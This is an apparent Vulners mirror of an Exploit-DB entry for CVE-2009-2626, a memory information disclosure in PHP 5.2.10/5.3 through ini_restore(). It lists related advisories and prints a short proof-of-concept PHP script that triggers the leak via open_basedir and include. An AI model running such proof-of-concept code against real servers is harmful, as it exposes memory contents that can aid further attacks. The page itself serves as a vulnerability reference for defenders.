Lucene search

K

PHP 5.2.10/5.3 - 'ini_restore()' Memory Information Disclosure (2)

🗓️ 10 Aug 2009 00:00:00Reported by Maksymilian ArciemowiczType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosur

Show more
Related
Code
ReporterTitlePublishedViews
Family
Cvelist
CVE-2009-2626
1 Dec 200916:00
–cvelist
F5 Networks
K13231 : PHP vulnerability CVE-2009-2626
9 Sep 201300:00
–f5
F5 Networks
SOL13231 - PHP vulnerability CVE-2009-2626
21 Nov 201100:00
–f5
Packet Storm
PHP ini_restore Memory Disclosure
4 Dec 200900:00
–packetstorm
CVE
CVE-2009-2626
1 Dec 200916:30
–cve
seebug.org
PHP ini_restore()内存信息泄露漏洞
30 Nov 200900:00
–seebug
UbuntuCve
CVE-2009-2626
1 Dec 200900:00
–ubuntucve
RedhatCVE
CVE-2009-2626
30 Oct 201510:18
–redhatcve
NVD
CVE-2009-2626
1 Dec 200916:30
–nvd
Exploit DB
PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure
3 Dec 200900:00
–exploitdb
Rows per page
source: https://www.securityfocus.com/bid/36009/info
 
PHP is prone to an information-disclosure vulnerability.
 
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 

<?php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");


include("B");

?>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
10 Aug 2009 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.014
32
.json
Report